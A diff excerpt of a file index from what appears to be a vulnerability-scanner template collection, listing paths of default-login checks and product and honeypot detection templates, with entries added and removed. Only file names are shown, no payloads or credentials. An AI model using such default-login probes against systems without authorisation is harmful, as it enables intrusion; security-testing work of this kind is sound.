./poc/default/visionhub-default-login-11027.yaml ./poc/default/visionhub-default-login-11028.yaml ./poc/default/visionhub-default-login-11029.yaml @@ -43823,7 +43798,6 @@ ./poc/default/wifisky-default-login-11203.yaml ./poc/default/wifisky-default-login-11204.yaml ./poc/default/wifisky-default-login.yaml -./poc/default/wifisky-default-password-11205.yaml ./poc/default/wifisky-default-password-11206.yaml ./poc/default/wifisky-default-password-cnvd-2021-39012.yml ./poc/default/wifisky-default-password.yaml @@ -43832,18 +43806,16 @@ ./poc/default/wso2-default-login-11640.yaml ./poc/default/wso2-default-login-11641.yaml ./poc/default/wso2-default-login-11642.yaml -./poc/default/wso2-default-login.yaml ./poc/default/wso2-default-password.yaml ./poc/default/xampp-default-page-11660.yaml -./poc/default/xampp-default-page-11661.yaml +./poc/default/xampp-default-page-11662.yaml ./poc/default/xampp-default-page-11663.yaml -./poc/default/xampp-default-page.yaml ./poc/default/xerox-workcentre7-default-password.yaml ./poc/default/xerox7-default-login-11678.yaml ./poc/default/xerox7-default-login-11679.yaml ./poc/default/xerox7-default-login-11680.yaml +./poc/default/xerox7-default-login.yaml ./poc/default/xerox7-default-password.yaml -./poc/default/xxljob-default-login-11709.yaml ./poc/default/xxljob-default-login-11710.yaml ./poc/default/xxljob-default-login-11711.yaml ./poc/default/xxljob-default-login-11712.yaml @@ -43871,13 +43843,14 @@ ./poc/detect/NagiosXI-CMS-Detect.yaml ./poc/detect/PFSense-Detect.yaml ./poc/detect/PRTGNetwork-Detect.yaml +./poc/detect/RedMine-Detect.yaml ./poc/detect/TestLink-Detect.yaml ./poc/detect/Tomcat-Path-normalize-detect.yaml ./poc/detect/Unifi-Detect.yaml ./poc/detect/ZoneMinder-Tech-Detect.yaml ./poc/detect/achecker-detect.yaml ./poc/detect/acontent-detect-31.yaml -./poc/detect/acontent-detect-32.yaml +./poc/detect/acontent-detect.yaml ./poc/detect/activemq-openwire-transport-detect.yaml ./poc/detect/ad-blocking-detector-29a2fe62a95c9b7d06f91cd4f479a678.yaml ./poc/detect/ad-blocking-detector.yaml @@ -43885,8 +43858,8 @@ ./poc/detect/adbhoney-detection-shell.yaml ./poc/detect/adbhoney-honeypot-cnxn-detect.yaml ./poc/detect/adbhoney-honeypot-shell-detect.yaml +./poc/detect/addeventlistener-detect-64.yaml ./poc/detect/addeventlistener-detect-65.yaml -./poc/detect/addeventlistener-detect-66.yaml ./poc/detect/addeventlistener-detect.yaml ./poc/detect/adminer-panel-detect.yaml ./poc/detect/admiralcloud-detect.yaml @@ -43896,7 +43869,6 @@ ./poc/detect/adobe-coldfusion-detect-4.yaml ./poc/detect/adobe-coldfusion-detect-5.yaml ./poc/detect/adobe-coldfusion-detect-6.yaml -./poc/detect/adobe-coldfusion-detect-82.yaml ./poc/detect/adobe-coldfusion-detect-83.yaml ./poc/detect/adobe-coldfusion-detect-84.yaml ./poc/detect/adobe-coldfusion-detector-1.yaml @@ -43907,8 +43879,9 @@ ./poc/detect/adobe-coldfusion-detector-6.yaml ./poc/detect/adobe-coldfusion-detector-error.yaml ./poc/detect/adobe-coldfusion-error-detect-85.yaml +./poc/detect/adobe-coldfusion-error-detect-86.yaml ./poc/detect/adobe-coldfusion-error-detect-87.yaml -./poc/detect/adobe-coldfusion-error-detect-88.yaml +./poc/detect/adobe-coldfusion-error-detect.yaml ./poc/detect/adselfservice-version-detect.yaml ./poc/detect/aem-detection-143.yaml ./poc/detect/aem-detection-144.yaml @@ -43916,36 +43889,38 @@ ./poc/detect/aem-detection.yaml ./poc/detect/airflow-detect-237.yaml ./poc/detect/airflow-detect-238.yaml -./poc/detect/airflow-detect-239.yaml +./poc/detect/airflow-detect-240.yaml ./poc/detect/aix-websm-detect.yaml ./poc/detect/alfresco-detect-258.yaml -./poc/detect/alfresco-detect-259.yaml +./poc/detect/alfresco-detect-260.yaml ./poc/detect/alfresco-detect.yaml ./poc/detect/amazon-mws-auth-token-detect.yaml ./poc/detect/amazon-sns-topic-disclosure-detect.yaml ./poc/detect/apache-activemq-detect.yaml +./poc/detect/apache-answer-detect.yaml ./poc/detect/apache-axis-detect-1.yaml ./poc/detect/apache-axis-detect-2.yaml ./poc/detect/apache-axis-detect-3.yaml +./poc/detect/apache-axis-detect-339.yaml ./poc/detect/apache-axis-detect-340.yaml -./poc/detect/apache-axis-detect.yaml -./poc/detect/apache-cocoon-detect-342.yaml +./poc/detect/apache-axis-detect-341.yaml +./poc/detect/apache-cocoon-detect.yaml ./poc/detect/apache-detect-345.yaml +./poc/detect/apache-detect-346.yaml ./poc/detect/apache-detect-347.yaml ./poc/detect/apache-detect-348.yaml ./poc/detect/apache-detect-349.yaml -./poc/detect/apache-detect.yaml ./poc/detect/apache-druid-detect.yaml ./poc/detect/apache-dubbo-detect.yaml ./poc/detect/apc-detect.yaml -./poc/detect/apollo-server-detect-522.yaml +./poc/detect/apollo-server-detect-523.yaml +./poc/detect/apollo-server-detect.yaml ./poc/detect/aptus-detect.yaml ./poc/detect/argocd-detect.yaml ./poc/detect/arris-modem-detect.yaml -./poc/detect/artica-web-proxy-detect-543.yaml ./poc/detect/artica-web-proxy-detect-544.yaml -./poc/detect/artica-web-proxy-detect-545.yaml ./poc/detect/artica-web-proxy-detect-546.yaml +./poc/detect/artica-web-proxy-detect.yaml ./poc/detect/artifactory-version-detect.yaml ./poc/detect/aspnet-version-detect.yaml ./poc/detect/atlantis-detect.yaml @@ -43953,11 +43928,10 @@ ./poc/detect/audiocodes-detect.yaml ./poc/detect/autobahn-python-detect-592.yaml ./poc/detect/autobahn-python-detect-593.yaml -./poc/detect/autobahn-python-detect-595.yaml +./poc/detect/autobahn-python-detect-594.yaml ./poc/detect/autoset-detect.yaml ./poc/detect/avantfax-detect-598.yaml ./poc/detect/avantfax-detect-599.yaml -./poc/detect/avantfax-detect-600.yaml ./poc/detect/avantfax-detect.yaml ./poc/detect/aviatrix-detect-606.yaml ./poc/detect/aviatrix-detect-607.yaml @@ -43966,7 +43940,6 @@ ./poc/detect/aws-elastic-beanstalk-detect-642.yaml ./poc/detect/aws-elastic-beanstalk-detect-643.yaml ./poc/detect/aws-elastic-beanstalk-detect-644.yaml -./poc/detect/aws-elastic-beanstalk-detect.yaml ./poc/detect/aws-sftp-detect.yaml ./poc/detect/axigen-mail-server-detect.yaml ./poc/detect/axis-detect.yaml @@ -43976,8 +43949,8 @@ ./poc/detect/azure-takeover-detection-683.yaml ./poc/detect/azure-takeover-detection.yaml ./poc/detect/basic-auth-detect.yaml -./poc/detect/basic-auth-detection-687.yaml ./poc/detect/basic-auth-detection-688.yaml +./poc/detect/basic-auth-detection-689.yaml ./poc/detect/basic-auth-detection-691.yaml ./poc/detect/basic-auth-detection.yaml ./poc/detect/bedita-detect-704.yaml @@ -43985,11 +43958,13 @@ ./poc/detect/bedita-detect.yaml ./poc/detect/bgp-detect.yaml ./poc/detect/bigbluebutton-detect-722.yaml -./poc/detect/bigbluebutton-detect-723.yaml +./poc/detect/bigbluebutton-detect.yaml ./poc/detect/bigip-config-utility-detect-1.yaml ./poc/detect/bigip-config-utility-detect-2.yaml ./poc/detect/bigip-config-utility-detect-3.yaml +./poc/detect/bigip-config-utility-detect-730.yaml ./poc/detect/bigip-config-utility-detect-731.yaml +./poc/detect/bigip-config-utility-detect-732.yaml ./poc/detect/bigip-config-utility-detect.yaml ./poc/detect/bigip-detection-734.yaml ./poc/detect/bigip-detection.yaml @@ -44012,23 +43987,20 @@ ./poc/detect/brother-printer-detect-790.yaml ./poc/detect/brother-printer-detect.yaml ./poc/detect/burp-api-detect-809.yaml -./poc/detect/burp-api-detect-812.yaml +./poc/detect/burp-api-detect-810.yaml ./poc/detect/burp-api-detect-813.yaml ./poc/detect/burp-api-detect.yaml ./poc/detect/cacti-detect-1.yaml ./poc/detect/cacti-detect-2.yaml -./poc/detect/cacti-detect-826.yaml ./poc/detect/cacti-detect.yaml ./poc/detect/carestream-vue-detect-1.yaml ./poc/detect/carestream-vue-detect-2.yaml ./poc/detect/carestream-vue-detect-859.yaml ./poc/detect/carestream-vue-detect-860.yaml -./poc/detect/carestream-vue-detect-861.yaml ./poc/detect/ccm-detect.yaml ./poc/detect/celebrus-detect.yaml ./poc/detect/centreon-detect-875.yaml ./poc/detect/centreon-detect-876.yaml -./poc/detect/centreon-detect-877.yaml ./poc/detect/centreon-detect.yaml ./poc/detect/changedetection-panel.yaml ./poc/detect/chatgpt-next-detection.yaml @@ -44047,15 +44019,14 @@ ./poc/detect/cisco-webvpn-detect.yaml ./poc/detect/citrix-adc-gateway-detect-1.yaml ./poc/detect/citrix-adc-gateway-detect-2.yaml -./poc/detect/citrix-adc-gateway-detect-981.yaml ./poc/detect/citrix-adc-gateway-detect-982.yaml +./poc/detect/citrix-adc-gateway-detect-983.yaml ./poc/detect/citrix-adc-gateway-detect.yaml ./poc/detect/citrix-honeypot-detect.yaml ./poc/detect/citrix-honeypot-detection.yaml ./poc/detect/citrix-netscaler-gateway-detect.yml ./poc/detect/citrix-vpn-detect-985.yaml ./poc/detect/citrix-vpn-detect-986.yaml -./poc/detect/citrix-vpn-detect-987.yaml ./poc/detect/citrix-vpn-detect.yaml ./poc/detect/clamav-detect.yaml ./poc/detect/clickhouse-db-detect.yaml @@ -44064,19 +44035,18 @@ ./poc/detect/cms-detect.yaml ./poc/detect/cname-service-detection-1032.yaml ./poc/detect/cname-service-detection.yaml -./poc/detect/cname-service-detector-1034.yaml ./poc/detect/cname-service-detector.yaml ./poc/detect/cobbler-version-detect.yaml ./poc/detect/cockpit-detect-1125.yaml -./poc/detect/cockpit-detect-1127.yaml +./poc/detect/cockpit-detect-1126.yaml ./poc/detect/cockpit-detect-1128.yaml ./poc/detect/cofense-vision-detection.yaml ./poc/detect/colasoft-network-information-comprehensive-detection-and-processing-platform.yaml ./poc/detect/comprehensive-swagger-ui-version-detection.yaml ./poc/detect/confluence-detect-1.yaml ./poc/detect/confluence-detect-1186.yaml -./poc/detect/confluence-detect-1187.yaml ./poc/detect/confluence-detect-1188.yaml +./poc/detect/confluence-detect-1189.yaml ./poc/detect/confluence-detect-2.yaml ./poc/detect/confluence-detect-3.yaml ./poc/detect/confluence-detect-4.yaml @@ -44094,14 +44064,14 @@ ./poc/detect/cql-native-transport-detect.yaml ./poc/detect/craft-cms-detect-1246.yaml ./poc/detect/craft-cms-detect-1247.yaml -./poc/detect/craft-cms-detect.yaml ./poc/detect/craftercms-detect.yaml ./poc/detect/create-mysql-detection.yaml ./poc/detect/crush-ftp-detect-1270.yaml ./poc/detect/crush-ftp-detect-1271.yaml +./poc/detect/crush-ftp-detect-1272.yaml ./poc/detect/crush-ftp-detect.yaml -./poc/detect/csrfguard-detect-1290.yaml ./poc/detect/csrfguard-detect-1291.yaml +./poc/detect/csrfguard-detect.yaml ./poc/detect/ctcms-detect.yaml ./poc/detect/cucm-detect.yaml ./poc/detect/custom-aem-ACPV-detect.yaml @@ -44111,6 +44081,7 @@ ./poc/detect/custom-connection-server-detect.yaml ./poc/detect/custom-ctc-panel-detect.yaml ./poc/detect/custom-data-alert-engine-service-detect.yaml +./poc/detect/custom-data-result-service-detect.yaml ./poc/detect/custom-datadump-source-code-detect.yaml ./poc/detect/custom-dom-xss-detect.yaml ./poc/detect/custom-dot-git-detect.yaml @@ -44144,8 +44115,8 @@ ./poc/detect/defaced-website-detect.yaml ./poc/detect/defacement-detect.yaml ./poc/detect/default-detect-generic-6837.yaml -./poc/detect/default-detect-generic-6838.yaml ./poc/detect/default-detect-generic-6839.yaml +./poc/detect/default-detect-generic.yaml ./poc/detect/dell-bmc-panel-detect.yaml ./poc/detect/dell-idrac6-detect-6918.yaml ./poc/detect/dell-idrac6-detect-6919.yaml @@ -44155,10 +44126,12 @@ ./poc/detect/dell-idrac7-detect-6923.yaml ./poc/detect/dell-idrac7-detect-6924.yaml ./poc/detect/dell-idrac7-detect-6925.yaml +./poc/detect/dell-idrac7-detect.yaml ./poc/detect/dell-idrac8-detect-6926.yaml ./poc/detect/dell-idrac8-detect-6928.yaml ./poc/detect/dell-idrac8-detect-6929.yaml ./poc/detect/dell-idrac9-detect-6936.yaml +./poc/detect/dell-idrac9-detect-6937.yaml ./poc/detect/dell-idrac9-detect-6938.yaml ./poc/detect/dell-idrac9-detect-6940.yaml ./poc/detect/dell-idrac9-detect-6941.yaml @@ -44171,17 +44144,19 @@ ./poc/detect/detect-all-takeovers.yaml ./poc/detect/detect-all-takovers.yaml ./poc/detect/detect-dangling-cname-6966.yaml +./poc/detect/detect-dangling-cname-6967.yaml ./poc/detect/detect-dangling-cname-6968.yaml ./poc/detect/detect-dns-over-https-6969.yaml ./poc/detect/detect-dns-over-https.yaml ./poc/detect/detect-drone-config-6971.yaml ./poc/detect/detect-drone-config-6972.yaml +./poc/detect/detect-drone-config-6973.yaml ./poc/detect/detect-drone.yaml ./poc/detect/detect-generic-website.yaml ./poc/detect/detect-jabber-xmpp-6974.yaml ./poc/detect/detect-jabber-xmpp-6975.yaml ./poc/detect/detect-jabber-xmpp.yaml -./poc/detect/detect-options-method-6978.yaml +./poc/detect/detect-options-method-6977.yaml ./poc/detect/detect-options-method.yaml ./poc/detect/detect-rsyncd-6979.yaml ./poc/detect/detect-rsyncd-6980.yaml @@ -44215,6 +44190,7 @@ ./poc/detect/django-debug-detect-7027.yaml ./poc/detect/django-debug-detect.yaml ./poc/detect/dns-saas-service-detection.yaml +./poc/detect/dns-waf-detect-7052.yaml ./poc/detect/dns-waf-detect-7053.yaml ./poc/detect/dns-waf-detect-7054.yaml ./poc/detect/dns-waf-detect.yaml @@ -44228,17 +44204,20 @@ ./poc/detect/dotclear-detect.yaml ./poc/detect/dotcms-version-detect.yaml ./poc/detect/dotnet-remoting-service-detect.yaml -./poc/detect/druid-detect-7098.yaml ./poc/detect/druid-detect-7099.yaml ./poc/detect/druid-detect.yaml +./poc/detect/dwr-index-detect-7135.yaml ./poc/detect/dwr-index-detect-7136.yaml +./poc/detect/dwr-index-detect.yaml ./poc/detect/eaton-power-manager-detect.yaml ./poc/detect/ec2-detection-7161.yaml -./poc/detect/ec2-detection-7162.yaml +./poc/detect/ec2-detection-7163.yaml ./poc/detect/eg-manager-detect-7182.yaml ./poc/detect/eg-manager-detect-7184.yaml +./poc/detect/eg-manager-detect.yaml ./poc/detect/elasticpot-honeypot-detection.yaml ./poc/detect/elasticsearch-sql-client-detect-7189.yaml +./poc/detect/elasticsearch-sql-client-detect-7190.yaml ./poc/detect/elasticsearch-sql-client-detect-7191.yaml ./poc/detect/elasticsearch-sql-client-detect-7192.yaml ./poc/detect/electron-version-detect.yaml @@ -44250,6 +44229,7 @@ ./poc/detect/ems-webclient-detect.yaml ./poc/detect/epson-access-detect-7233.yaml ./poc/detect/epson-access-detect-7234.yaml +./poc/detect/epson-access-detect-7235.yaml ./poc/detect/epson-access-detect-7236.yaml ./poc/detect/epson-access-detect-7237.yaml ./poc/detect/epson-access-detect.yaml @@ -44269,8 +44249,9 @@ ./poc/detect/fanruanoa-detect-1.yaml ./poc/detect/fanruanoa-detect-2.yaml ./poc/detect/fanruanoa-detect-7391.yaml +./poc/detect/fanruanoa-detect-7392.yaml ./poc/detect/fanruanoa2012-detect-7387.yaml -./poc/detect/fanruanoa2012-detect.yaml +./poc/detect/fanruanoa2012-detect-7388.yaml ./poc/detect/fatpipe-mpvpn-detect-7437.yaml ./poc/detect/fatpipe-mpvpn-detect-7438.yaml ./poc/detect/fatpipe-mpvpn-detect.yaml @@ -44278,7 +44259,6 @@ ./poc/detect/fatpipe-warp-detect-7440.yaml ./poc/detect/fatpipe-warp-detect.yaml ./poc/detect/favicon-detect.yaml -./poc/detect/favicon-detection-7441.yaml ./poc/detect/favicon-detection-7442.yaml ./poc/detect/favicon-detection-7443.yaml ./poc/detect/favicon-detection-7445.yaml @@ -44301,6 +44281,7 @@ ./poc/detect/fortinet-detect.yaml ./poc/detect/froxlor-detect-7551.yaml ./poc/detect/froxlor-detect-7552.yaml +./poc/detect/froxlor-detect-7553.yaml ./poc/detect/froxlor-detect-7554.yaml ./poc/detect/fuji-xerox-printer-detect.yaml ./poc/detect/gaspot-honeypot-detect.yaml @@ -44308,6 +44289,7 @@ ./poc/detect/geowebserver-detector.yaml ./poc/detect/gerapy-detect.yaml ./poc/detect/gespage-detect-7602.yaml +./poc/detect/gespage-detect-7603.yaml ./poc/detect/gespage-detect.yaml ./poc/detect/getsimple-cms-detect-1.yaml ./poc/detect/getsimple-cms-detect-2.yaml @@ -44326,6 +44308,7 @@ ./poc/detect/gitea-detect.yaml ./poc/detect/github-enterprise-detect-7647.yaml ./poc/detect/github-enterprise-detect-7648.yaml +./poc/detect/github-enterprise-detect-7649.yaml ./poc/detect/github-enterprise-detect-7650.yaml ./poc/detect/github-enterprise-detect-7651.yaml ./poc/detect/github-enterprise-detect.yaml @@ -44353,14 +44336,13 @@ ./poc/detect/grafana-detect-7805.yaml ./poc/detect/grafana-detect-7806.yaml ./poc/detect/grafana-detect-7807.yaml -./poc/detect/grafana-detect-7808.yaml ./poc/detect/grafana-detect.yaml ./poc/detect/graphite-browser-detect.yaml ./poc/detect/graphql-apiforwp-detect.yaml ./poc/detect/graphql-apollo-detect.yaml ./poc/detect/graphql-ariadne-detect.yaml ./poc/detect/graphql-detect-7829.yaml -./poc/detect/graphql-detect-7831.yaml +./poc/detect/graphql-detect-7830.yaml ./poc/detect/graphql-detect-7832.yaml ./poc/detect/graphql-detect.yaml ./poc/detect/graphql-dianajl-detect.yaml @@ -44381,43 +44363,39 @@ ./poc/detect/grav-cms-detect-7841.yaml ./poc/detect/grav-cms-detect-7842.yaml ./poc/detect/grav-cms-detect-7845.yaml -./poc/detect/grav-cms-detect.yaml -./poc/detect/gunicorn-detect-7862.yaml ./poc/detect/gunicorn-detect-7863.yaml ./poc/detect/gunicorn-detect-7864.yaml ./poc/detect/gunicorn-detect-7865.yaml ./poc/detect/hanwang-detect-7881.yaml ./poc/detect/hanwang-detect-7882.yaml -./poc/detect/harbor-detect-7886.yaml ./poc/detect/harbor-detect-7887.yaml ./poc/detect/harbor-detect-7888.yaml ./poc/detect/harbor-detect.yaml ./poc/detect/hash-detection.yaml -./poc/detect/herokuapp-detect-7937.yaml ./poc/detect/herokuapp-detect-7938.yaml -./poc/detect/herokuapp-detect-7939.yaml ./poc/detect/herokuapp-detect-7940.yaml ./poc/detect/herokuapp-detect.yaml ./poc/detect/hikvision-detect.yaml ./poc/detect/hikvision-detection-1.yaml ./poc/detect/hikvision-detection-2.yaml +./poc/detect/hikvision-detection-7954.yaml +./poc/detect/hikvision-detection-7955.yaml ./poc/detect/hikvision-detection.yaml ./poc/detect/home-assistant-detect.yaml ./poc/detect/hp-blade-admin-detect-8003.yaml -./poc/detect/hp-blade-admin-detect-8004.yaml ./poc/detect/hp-blade-admin-detect-8005.yaml ./poc/detect/hp-color-laserjet-detect.yaml ./poc/detect/hp-device-info-detect-8007.yaml ./poc/detect/hp-device-info-detect-8008.yaml -./poc/detect/hp-device-info-detect-8010.yaml +./poc/detect/hp-device-info-detect-8009.yaml ./poc/detect/hp-device-info-detect.yaml ./poc/detect/hp-laserjet-detect-8026.yaml ./poc/detect/hp-laserjet-detect-8027.yaml ./poc/detect/hp-laserjet-detect-8028.yaml ./poc/detect/hp-media-vault-detect-8029.yaml -./poc/detect/hp-media-vault-detect-8030.yaml ./poc/detect/hp-media-vault-detect-8031.yaml ./poc/detect/htpasswd-detection-8045.yaml +./poc/detect/htpasswd-detection-8046.yaml ./poc/detect/htpasswd-detection.yaml ./poc/detect/httpbin-detection.yaml ./poc/detect/httpbin-detection.yml @@ -44447,17 +44425,15 @@ ./poc/detect/istat-panel-detect.yaml ./poc/detect/itop-detect-8201.yaml ./poc/detect/itop-detect-8202.yaml -./poc/detect/itop-detect-8203.yaml ./poc/detect/itop-detect.yaml ./poc/detect/jaspersoft-detect-8219.yaml -./poc/detect/jaspersoft-detect-8220.yaml ./poc/detect/jaspersoft-detect.yaml +./poc/detect/java-rmi-detect-8227.yaml ./poc/detect/java-rmi-detect-8228.yaml ./poc/detect/java-rmi-detect.yaml ./poc/detect/javamelody-detect.yaml -./poc/detect/jboss-detect.yaml +./poc/detect/jboss-detect-8237.yaml ./poc/detect/jeecg-boot-detect-8247.yaml -./poc/detect/jeecg-boot-detect-8248.yaml ./poc/detect/jeedom-detect-8250.yaml ./poc/detect/jeedom-detect-8251.yaml ./poc/detect/jeedom-detect.yaml @@ -44466,23 +44442,24 @@ ./poc/detect/jellyfin-detect-4.yaml ./poc/detect/jellyfin-detect-8256.yaml ./poc/detect/jellyfin-detect-8257.yaml -./poc/detect/jellyfin-detect-8258.yaml +./poc/detect/jellyfin-detect-8259.yaml ./poc/detect/jellyfin-detect-8260.yaml +./poc/detect/jellyfin-detect.yaml ./poc/detect/jenkins-detect-8274.yaml -./poc/detect/jenkins-detect-8275.yaml +./poc/detect/jenkins-detect-8276.yaml ./poc/detect/jenkins-detect.yaml ./poc/detect/jenkins-headers-detect.yaml ./poc/detect/jenkins-login-detection.yaml ./poc/detect/jira-detect-1.yaml ./poc/detect/jira-detect-2.yaml ./poc/detect/jira-detect-3.yaml -./poc/detect/jira-detect-8314.yaml +./poc/detect/jira-detect-8313.yaml ./poc/detect/jira-detect-8315.yaml ./poc/detect/jira-detect-8316.yaml ./poc/detect/jira-detect.yaml ./poc/detect/js-libraries-detect.yaml ./poc/detect/jsf-detection-8396.yaml -./poc/detect/jsf-detection-8397.yaml +./poc/detect/jsf-detection-8398.yaml ./poc/detect/jsf-detection.yaml ./poc/detect/jwt-detection.yaml ./poc/detect/kavita-panel-detect.yaml @@ -44493,7 +44470,7 @@ ./poc/detect/kibana-detect-1.yaml ./poc/detect/kibana-detect-2.yaml ./poc/detect/kibana-detect-3.yaml -./poc/detect/kibana-detect-8484.yaml +./poc/detect/kibana-detect-8483.yaml ./poc/detect/kibana-detect.yaml ./poc/detect/kong-detect-8498.yaml ./poc/detect/kong-detect-8499.yaml @@ -44520,7 +44497,9 @@ ./poc/detect/linkerd-badrule-detect-8630.yaml ./poc/detect/linkerd-badrule-detect-8631.yaml ./poc/detect/linkerd-badrule-detect.yaml -./poc/detect/linkerd-detect-8632.yaml +./poc/detect/linkerd-detect-8633.yaml +./poc/detect/linkerd-detect.yaml +./poc/detect/linkerd-service-detect-8634.yaml ./poc/detect/linkerd-service-detect-8635.yaml ./poc/detect/linkerd-service-detect.yaml ./poc/detect/linkerd-ssrf-detect-8636.yaml @@ -44544,13 +44523,14 @@ ./poc/detect/magento-detect-8706.yaml ./poc/detect/magento-detect-8707.yaml ./poc/detect/magmi-detect-8714.yaml -./poc/detect/magmi-detect-8715.yaml +./poc/detect/magmi-detect-8716.yaml ./poc/detect/magmi-detect-8717.yaml ./poc/detect/mahara-version-detect.yaml ./poc/detect/maian-cart-detect-8718.yaml -./poc/detect/maian-cart-detect-8719.yaml +./poc/detect/maian-cart-detect.yaml ./poc/detect/mailoney-honeypot-detect.yaml ./poc/detect/mailoney-honeypot-detection.yaml +./poc/detect/mantis-detect-8780.yaml ./poc/detect/mantis-detect-8781.yaml ./poc/detect/mantis-detect.yaml ./poc/detect/mautic-crm-detect-8787.yaml @@ -44560,12 +44540,13 @@ ./poc/detect/mediawiki-version-detect.yaml ./poc/detect/megarac-sp-ui-detect.yaml ./poc/detect/meilisearch-detect.yaml -./poc/detect/metabase-detect-8804.yaml ./poc/detect/metabase-detect-8805.yaml ./poc/detect/metabase-detect.yaml ./poc/detect/mfiles-web-detect.yaml ./poc/detect/microsoft-echange-server-detect.yaml ./poc/detect/microsoft-exchange-server-detect-8852.yaml +./poc/detect/microsoft-exchange-server-detect-8853.yaml +./poc/detect/microsoft-exchange-server-detect-8854.yaml ./poc/detect/microsoft-exchange-server-detect.yaml ./poc/detect/microsoft-ftp-service-detect.yaml ./poc/detect/microstrategy-detect-1.yaml @@ -44598,23 +44579,25 @@ ./poc/detect/mitel-panel-detect.yaml ./poc/detect/mobileiron-version-detect.yaml ./poc/detect/moinmoin-detect-8915.yaml +./poc/detect/moinmoin-detect-8916.yaml ./poc/detect/moinmoin-detect-8917.yaml ./poc/detect/moinmoin-detect-8918.yaml ./poc/detect/moinmoin-detect.yaml ./poc/detect/mongodb-detect-8919.yaml +./poc/detect/mongodb-detect-8920.yaml ./poc/detect/mongodb-detect-8921.yaml ./poc/detect/mongodb-detect.yaml ./poc/detect/monstracms-detect.yaml ./poc/detect/moodle-version-detect.yaml +./poc/detect/moveit-detect.yaml ./poc/detect/moveit-sftp-detect.yaml -./poc/detect/moveit-transfer-detect.yaml ./poc/detect/mrtg-detect-1.yaml ./poc/detect/mrtg-detect-2.yaml ./poc/detect/mrtg-detect-3.yaml ./poc/detect/mrtg-detect-8958.yaml ./poc/detect/mrtg-detect-8959.yaml ./poc/detect/mrtg-detect.yaml -./poc/detect/ms-adcs-detect-8960.yaml +./poc/detect/ms-adcs-detect-8961.yaml ./poc/detect/ms-adcs-detect.yaml ./poc/detect/ms-sql-detect.yaml ./poc/detect/msmq-detect.yaml @@ -44627,6 +44610,7 @@ ./poc/detect/nacos-detect.yaml ./poc/detect/nameserver-detection.yaml ./poc/detect/neos-detect-9013.yaml +./poc/detect/neos-detect.yaml ./poc/detect/nessus-detect.yaml ./poc/detect/netdata-dashboard-detected-9022.yaml ./poc/detect/netdata-dashboard-detected.yaml @@ -44642,6 +44626,7 @@ ./poc/detect/nextcloud-detect-1.yaml ./poc/detect/nextcloud-detect-2.yaml ./poc/detect/nextcloud-detect-3.yaml +./poc/detect/nextcloud-detect-9079.yaml ./poc/detect/nextcloud-detect-9080.yaml ./poc/detect/nextcloud-detect-9081.yaml ./poc/detect/nextcloud-owncloud-detect.yaml @@ -44655,27 +44640,27 @@ ./poc/detect/node-red-detect-9138.yaml ./poc/detect/node-red-detect.yaml ./poc/detect/oauth2-detect-9180.yaml -./poc/detect/oauth2-detect-9181.yaml ./poc/detect/oauth2-detect-9182.yaml ./poc/detect/oauth2-detect-9183.yaml ./poc/detect/octobercms-detect-1.yaml ./poc/detect/octobercms-detect-2.yaml ./poc/detect/octobercms-detect-9194.yaml -./poc/detect/octobercms-detect-9195.yaml ./poc/detect/octobercms-detect-9196.yaml ./poc/detect/oidc-detect-9216.yaml ./poc/detect/oidc-detect-9218.yaml +./poc/detect/oidc-detect.yaml +./poc/detect/oipm-detect-9219.yaml ./poc/detect/oipm-detect-9220.yaml ./poc/detect/oipm-detect-9221.yaml -./poc/detect/oipm-detect-9222.yaml ./poc/detect/oipm-detect.yaml ./poc/detect/olivetti-crf-detect-9242.yaml ./poc/detect/olivetti-crf-detect-9243.yaml -./poc/detect/olivetti-crf-detect-9244.yaml ./poc/detect/oneblog-detect-9245.yaml +./poc/detect/oneblog-detect-9246.yaml ./poc/detect/oneblog-detect-9247.yaml ./poc/detect/open-virtualization-manager-detect-9325.yaml ./poc/detect/open-virtualization-manager-detect-9326.yaml +./poc/detect/open-virtualization-manager-detect.yaml ./poc/detect/openam-detect.yaml ./poc/detect/openam-detection-1.yaml ./poc/detect/openam-detection-10.yaml @@ -44699,14 +44684,13 @@ ./poc/detect/opencast-detect-9263.yaml ./poc/detect/opencast-detect-9264.yaml ./poc/detect/opencast-detect-9266.yaml -./poc/detect/openemr-detect-9271.yaml ./poc/detect/openemr-detect-9272.yaml ./poc/detect/openemr-detect-9273.yaml +./poc/detect/openemr-detect-9274.yaml ./poc/detect/openemr-detect.yaml ./poc/detect/opengear-detect.yaml ./poc/detect/opensis-detect-1.yaml ./poc/detect/opensis-detect-2.yaml -./poc/detect/opensis-detect-9313.yaml ./poc/detect/opensis-detect.yaml ./poc/detect/openssh-detect.yaml ./poc/detect/openssh-detect.yml @@ -44716,45 +44700,42 @@ ./poc/detect/openx-detect.yaml ./poc/detect/oracle-dbass-detect-9349.yaml ./poc/detect/oracle-dbass-detect-9350.yaml -./poc/detect/oracle-dbass-detect-9351.yaml -./poc/detect/oracle-dbass-detect.yaml ./poc/detect/owasp-juice-shop-detected-9414.yaml ./poc/detect/owasp-juice-shop-detected-9415.yaml +./poc/detect/owasp-juice-shop-detected-9416.yaml ./poc/detect/owasp-juice-shop-detected-9417.yaml -./poc/detect/owasp-juice-shop-detected-9418.yaml +./poc/detect/owasp-juice-shop-detected.yaml ./poc/detect/panel-detect.yaml ./poc/detect/parallels-hsphere-detect.yaml ./poc/detect/pega-detect-9473.yaml ./poc/detect/pega-detect-9474.yaml ./poc/detect/pega-detect-9475.yaml ./poc/detect/pega-detect-9476.yaml -./poc/detect/pega-detect.yaml ./poc/detect/pexip-detect.yaml ./poc/detect/pgsql-detect.yaml ./poc/detect/pgsql-version-detect.yaml ./poc/detect/php-proxy-detect-1.yaml ./poc/detect/php-proxy-detect-2.yaml ./poc/detect/php-proxy-detect-9544.yaml -./poc/detect/php-proxy-detect.yaml +./poc/detect/phpcollab-detect-9499.yaml ./poc/detect/phpcollab-detect-9500.yaml ./poc/detect/phpcollab-detect.yaml ./poc/detect/phpmyadmin-version-detect.yaml ./poc/detect/phpmyadmin-version-detection.yaml ./poc/detect/pi-hole-detect-9580.yaml -./poc/detect/pi-hole-detect-9581.yaml +./poc/detect/pi-hole-detect-9582.yaml ./poc/detect/pi-hole-detect-9583.yaml ./poc/detect/pi-hole-detect.yaml ./poc/detect/piwigo-detect.yaml ./poc/detect/plone-cms-detect-9605.yaml ./poc/detect/plone-cms-detect-9606.yaml -./poc/detect/plone-cms-detect-9607.yaml +./poc/detect/plone-cms-detect-9608.yaml ./poc/detect/plone-cms-detect-9609.yaml -./poc/detect/plone-cms-detect.yaml ./poc/detect/polycom-admin-detect-9624.yaml ./poc/detect/polycom-admin-detect.yaml ./poc/detect/pop3-detect.yaml 